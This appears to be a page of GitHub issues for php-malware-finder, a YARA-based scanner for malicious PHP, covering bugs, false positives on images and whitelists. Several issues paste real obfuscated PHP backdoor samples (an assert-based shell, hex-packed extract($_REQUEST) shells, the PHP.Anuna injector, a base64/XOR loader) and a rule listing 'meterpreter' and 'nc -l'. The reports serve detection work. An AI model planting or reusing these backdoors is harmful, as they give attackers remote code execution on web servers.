jvoisin / php-malware-finder Goto Github PK
View Code? Open in Web Editor NEWDetect potentially malicious PHP files
License: GNU Lesser General Public License v3.0
Detect potentially malicious PHP files
License: GNU Lesser General Public License v3.0
214 $ = "ls -la" fullword
215 $ = "meterpreter" fullword" <-----
216 $ = "nc -l" fullword
Line 215 has a stray " that causes
./malwares.yara(216): error: unterminated string
./malwares.yara(216): error: syntax error, unexpected $end, expecting CONDITION
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>
What can we do about this?
Even if it's super-far-fetched, it would be nice to move from SHA1 to SHA256, to avoid having a collision between a bad file and whitelist.
for the blue man :)
It would be helpful if it were possible to exclude certain filetypes from the malware scan. I am seeing a lot of false positives generated by uploaded image files in a Wordpress install, for example.
Now that yara is in travis-ci it would be cool to to PMF on it too.
Running the tool with the -h option lists a -c option which is "Optional path to a configuration file"
This sounds useful - however, where are the docs? What can config files do? :)
<?php $debug = pack("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));
<?php $debug = "ch". "r"; $debug = implode(array_map($debug, explode(":","112:97:99:107"))); $debug = $debug("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));
I'm not good with regex, but i'm seeing false positives for php with simple "/x0d/x09/x09" , especially indented functions, etc.
I don't think it's a good idea to promote running unknown binaries downloaded from the internet. Having yara in the git makes it heavy and unsafe.
I recommend having a few instructions to install yara (easy on most distributions) and if all else fails offer a download of that binary file from some other hosting.
Hello,
I just found your amazing software, thanks you for all this. That's great.
I'm currently working on a quick and efficient solution in order to remove PHP.Anuna from an infected Prestashop.
Your software only detect 2 infected files instead of hundred.
I would like to help you to improve your work.
How can i help ?
PS : To detect PHP.Anuna, you have to detect this sequence : "\x61\156\x75\156\x61"
inside a PHP file, always at the beginning of the file.
Best regards,
Vincent GUESNARD
When i run ./phpmalwarefinder -h
i get following error
Unable to find yara in your PATH, and in the current directory.
As seen today, seems (surprisingly) undetected by pmf :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $uahzsvtxsn = 'x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>6767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x5c%x7825:<**#57]38y]47]67y]37]887827pd%x5c%x78256<pd%ojneb#-*f%x5c%x7825)sf%x5c%|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%xgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppd5mm)%x5c%x7825%x5c%x7878:-!%x5c%x782ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%xc6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x55)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%156%x75%156%x61"])))) { $:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm25nfd)##Qtpz)#]341]88%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782opo#>b%x5c%x7825!**X]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3eturn chr(ord($n)-1);} @error_reporting(0); preg_repl%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggf2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782g!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y75c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6e#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*25:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+3%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x2825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:82R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825jgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c52]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825t%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x55)!gj!<**2-4-bubE{h%x5c%x7825)sutcvtG#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x7825cB%x5c%x7825iN<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78pd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%782f#0#%x5c%x782f*#nx7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{23zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x787-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%xx7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7827k:!ftmf!}Z;^nbsbq%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfv;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}25-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-5j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x78825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%xN}#-%x5c%x7825o:W%x5c%x782#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#f%x5c%x7860gvodujpo)##-!#~<#%x5c%xif((function_exists("%x6f%142%x5fx7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x784tvctus)%x5c%x7825%x5c%x7824-%x+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!81#%x5c%x782f#7e:559~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf8%151%x6d%160%x6c%157%x64%146<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x50ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787x7878pmpusut)tpqssutRe%x5c%x782fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x76*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*ix7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x785]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c256<pd%x5c%x7825w6Z6<.3;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{h]g2y]#>>*4-1-bubE{h%x5c%x782M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23s-%x5c%x7825r%x5c%x7878B%x5c%x7<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~67825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x78860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%25j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbu5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%163%x74%141%x72%164") && (!isset($GLOBALS["%x61f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787d%x5c%x7825)dfyfR%x5c%x7827BSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x782565c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x782482#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]c%x7825hOh%x5c%x782f#00m%x5c%x7825):fmji%x5c%x7878:<##:~!}%x5c%x787f;!|!}{;)gj}l;33bq}k8M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]363g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7824%x7825r%x5c%x785c2^-%x5U<#16,47R57,27R66,#%x5c%x782fq%x5c%4*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!7825hW~%x5c%x7825fdy)##-85cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x786x5c%x7827;!>>>!}_;gvcmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#256<C%x5c%x7827pd%x5c%x78256|6%x7825!<5h%x5c%x7825%x5c%x%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860T]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1W~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x782%x5c%x7825fdy<Cb*[%x51%76%x21%50%x5c%x7825%x5c%x7878:!>#]y!#~<%x5c%x7825h00#*<%x5c%x78]273]y76]271]y7d]252]y74]25697f:5297e:56-%x5c%x7878r.985:52985-t.925j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x%x7860%x5c%x7825}X;!sp!*#opo#x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%7825)!gj!<2,*j%x5c%x7825-#1]#-b265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%MFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860F%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7824]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]27x7825t2w>#]y74]273]y76]2825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bsfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]385)sutcvt)!gj!|!*bubE{h%x5c%x7825)j}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cc%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tustfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTO4]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}ace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x2x7825>2q%x5c%x7825<#g6R85,67R37,18%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT*<%x22%51%x29%51%x29%73", NULL); })ufttj%x5c%x7822)gj!ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V1]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65%x5c%x7825}&;ftmbg}%x5cy8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5cx5c%x787fw6*CW&)7gj6<*K)ftpmdXA6sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbd%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%827&6<%x5c%x787fw6*%x5c%x787f_*#[k785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x7x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%xQwTW%x5c%x7825hIr%x5c%x785c1^-%x5c{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x782ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7x5c%x7825%x5c%x785cSFWSFT%x5c8]y6g]273]y76]271]y7dsfw)%x5c%x7825zW%x5c%x7825h>EzH,2W5!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5cx5c%x785c2^<!Ce*[!%x5c%x782)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y%x78272qj%x5c%x78256<^#zsfvr#%x334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]255%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%15gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x75c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824%x7825)m%x5c%x7825=*h%x5c%x7825)u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)3<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%xUOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%2%x66%147%x67%42%x2c%162%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfq%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw1^W%x5c%x7825c!>!%x5c%x7825i%)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!k~~~<ftmbg!osvufs!|ftmf!~<**9.-24*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x782ssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#]y39]252]y83]273]y72]25cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sbc%x7825)fnbozcYufhA%x5c55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-i787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!oepn)%x5c%x7825epnbss-%x546-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z]252]y74]256#<!%x5c%x7825fx7825!*72!%x5c%x7827!hmg%x5c%x/(.*)/epreg_replaceubosazcmdw'; $zcxhrsvrrm = explode(chr((140-96)),'3390,33,5175,48,992,26,3727,55,1345,53,7491,52,4168,28,8576,55,8970,23,1970,70,6266,37,5612,68,199,48,279,21,6576,48,4572,23,1716,52,2437,35,6043,30,1159,70,7881,32,3881,50,4648,38,6624,39,3462,58,8879,55,5124,51,7577,52,2677,68,9797,50,4196,65,9598,23,8495,31,757,40,2899,67,377,40,8054,47,5875,50,4261,44,5223,42,3520,55,2166,45,9101,57,4395,47,5265,27,7269,52,5292,64,4858,50,3278,37,8020,34,8993,44,4336,59,9730,67,7957,63,5925,21,7806,23,9990,60,2966,63,9269,31,4686,45,3575,62,9338,60,10076,30,6663,31,504,58,797,46,2745,67,6814,63,2316,36,8449,46,4731,28,7131,34,9847,64,8631,66,4121,47,8192,60,8376,46,6073,26,2578,20,2472,49,7382,58,0,47,930,62,6455,43,1905,65,7913,44,9454,58,300,27,4305,31,880,50,562,39,6759,55,601,32,8934,36,8101,57,6006,37,1282,20,7663,20,327,50,7010,61,2875,24,8292,29,6547,29,2521,57,3423,39,4442,69,1821,40,1018,64,417,51,1768,53,5791,60,3668,59,5005,53,2598,40,7683,54,153,46,5703,35,7543,34,2105,61,9187,53,9664,66,5513,32,4595,53,3029,35,8814,65,2638,39,701,56,6331,28,9512,22,5407,51,6694,65,6943,24,2211,60,8252,40,3128,56,247,32,47,42,2812,63,8782,32,5481,32,3996,67,7071,60,3931,65,7440,51,8526,50,8321,21,10050,26,6498,49,8739,43,1229,53,3637,31,5356,51,9037,64,5946,60,7829,52,2271,45,4966,39,9300,38,5058,66,3356,34,9398,27,9425,29,5738,53,4511,61,2417,20,7165,50,9158,29,8422,27,9534,64,9911,25,7215,54,8342,34,3315,41,8158,34,5680,23,5458,23,8697,42,6967,43,4827,31,2040,65,6359,38,1861,44,3861,20,9936,54,6150,55,3210,68,1302,43,633,68,9621,43,6245,21,4063,58,5851,24,6303,28,1082,21,4759,68,5545,67,7321,61,1103,56,1457,57,3184,26,1627,41,843,37,3828,33,1514,65,3064,64,6397,58,4908,58,1668,48,9240,29,6099,51,6205,40,468,36,3782,46,2352,65,1398,59,1579,48,6877,66,7737,69,89,64,7629,34'); $loerhzvnej=substr($uahzsvtxsn,(32676-22570),(40-33)); if (!function_exists('uhlgvbkyjj')) { function uhlgvbkyjj($qrmybpqqzs, $lzpohvttqw) { $hstjkllsfv = NULL; for($wayquepjea=0;$wayquepjea<(sizeof($qrmybpqqzs)/2);$wayquepjea++) { $hstjkllsfv .= substr($lzpohvttqw, $qrmybpqqzs[($wayquepjea*2)],$qrmybpqqzs[($wayquepjea*2)+1]); } return $hstjkllsfv; };} $lwilxtcnpv="\x20\57\x2a\40\x65\153\x69\147\x65\147\x6e\156\x7a\153\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\64\x38\55\x31\61\x31\51\x29\54\x20\143\x68\162\x28\50\x33\66\x39\55\x32\67\x37\51\x29\54\x20\165\x68\154\x67\166\x62\153\x79\152\x6a\50\x24\172\x63\170\x68\162\x73\166\x72\162\x6d\54\x24\165\x61\150\x7a\163\x76\164\x78\163\x6e\51\x29\51\x3b\40\x2f\52\x20\166\x61\141\x77\161\x73\165\x76\152\x75\40\x2a\57\x20"; $kwrtwsusop=substr($uahzsvtxsn,(30815-20702),(53-41)); $kwrtwsusop($loerhzvnej, $lwilxtcnpv, NULL); $kwrtwsusop=$lwilxtcnpv; $kwrtwsusop=(831-710); $uahzsvtxsn=$kwrtwsusop-1; ?>
cheers !
See here
Using the -u
switch just grabs the whitelists from the master branch here. Which would be fine if they were being kept updated.
I mean, WP is at version 4.9.1 which results in quite a few false positives on a clean install.
There is no repository for updated whitelists? It seems to me it should be trivial to set up an automated workflow with WP-CLI on some cloud provider in order to fetch a fresh WP whenever there is a new version and generate a whitelist automatically.
So, I guess this is a feature request?
I tried generating my own whitelist for v4.9.1 but I get the following (Ubuntu 16.04)
apt install python-yara -y
[...]
~#: ./generate_whitelist.py wordpress491 /var/www/html
Traceback (most recent call last):
File "./generate_whitelist.py", line 30, in <module>
matches = rules.match(fname, fast=True)
yara.Error: could not map file "/var/www/html/wp-login.php" into memory
If you could assist in the above error, maybe I can assist in building an automated system for generating whitelists for Wordpress (I am a devops at a cloud VPS provider, so I can automate the setup of a clean environment and host the resulting whitelist files, if you wish ...)
Here is a nice collection of php backdoors : https://github.com/bartblaze/PHP-backdoors
Should be nice to test PMF against in order to modify/enhance some rules...
root@web:~/php-malware-finder# ./phpmalwarefinder -v /home/
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"
./whitelist.yara(120): error: undefined identifier "Wordpress"
./malwares.yara(65): error: undefined identifier "IsWhitelisted"
./malwares.yara(113): error: undefined identifier "IsWhitelisted"
./malwares.yara(151): error: undefined identifier "IsWhitelisted"
./malwares.yara(186): error: undefined identifier "IsWhitelisted"
./malwares.yara(218): error: undefined identifier "IsWhitelisted"
Debian GNU/Linux 8.1 (jessie) (x86_64)
i generate wordpress plugin folder using generate_whitelist.py
and put it in whitelists folder, include the url in whitelist.yar.
but, some file still detected as a malware. do i did something wrong? could you please tell me who to make proper whitelist?
Thank you
I'm trying to test PMF against a potentially vulnerable Prestashop installation and I'm getting hundreds of false positive against images.
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/1/101.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/5/155-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-cart_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-medium_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/7/107.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-medium_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/9/109.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/9/199-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/9/199-home_atch.jpg
Any idea?
Hello, I tried for the first time php-malware-finder and it find a lot of hacked code. But for example it don't detect this type of hack
@error_reporting(0);@ini_set('display_errors',false);defined('<84>··7³µ³8¸13530´·') || define('<84>··7³µ³8¸13530´·',__FILE__);global $<83>³µ7834¶81µ9´2¸5;global $·53´·¶6³9¶7775µ³; if(!function_exists('³0µ93µµ¶98511086')){ function ³0µ93µµ¶98511086($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @<87>7µ16´¸2´923¶895(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $<89>9·2³µ·2851µ5´5µ^$³71¸¸34076112µ06; }} if(!function_exists('´8·18¶3¸´µ9´µ1´8')){ function ´8·18¶3¸´µ9´µ1´8($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @¶¸8¶0³42¸·4¶791¸(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $³71¸¸34076112µ06^$<89>9·2³µ·2851µ5´5µ; 